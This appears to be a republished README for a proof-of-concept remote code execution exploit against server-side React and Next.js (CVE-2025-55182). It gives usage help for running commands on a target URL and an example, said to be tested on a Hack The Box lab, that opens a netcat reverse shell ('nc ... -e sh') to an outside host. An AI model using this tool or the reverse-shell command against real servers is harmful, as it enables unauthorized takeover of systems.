Share
## https://sploitus.com/exploit?id=F96B9910-C05E-5CD4-BA02-805BE54C3CA3
# CVE-2025-55182-React2Shell

xpl0ited by [infrar3d](https://github.com/Infrar3dd)

A 10.0 critical severity vulnerablility affecting server-side use of React.js, tracked as CVE-2025-55182 in React.js and CVE-2025-66478 specifically for the Next.js framework.

This vulnerability was responsibly **disclosed by Lachlan Davidson** on 29 November 2025 PT to the Meta team. Initial disclosure and patch release was performed by React and Vercel on 3 December 2025 PT. (Original: https://react2shell.com/)

### Usage:

```bash
python3 CVE-2025-55182.py --help 
usage: python CVE-2025-55182.py -u  [-c COMMAND]

CVE-2025-55182 - React Server Components RCE Exploit

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL (required)
  -c, --command COMMAND
                        Command to execute on target (default: id)

Example: python CVE-2025-55182.py -u http://target.com -c "whoami"


```

### Example (tested on HTB task):

```bash
python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"

```

### โš ๏ธ Disclaimer โš ๏ธ

This software and proof-of-concept code is provided **for educational and research purposes only**. 

*   The authors are **not responsible** for any misuse or damage caused by this program.
*   **Do not use** against any systems without explicit **prior permission**.
*   Use of this tools for attacking targets without consent is **illegal**.

You are responsible for obeying all applicable laws. **Use ethically and responsibly.**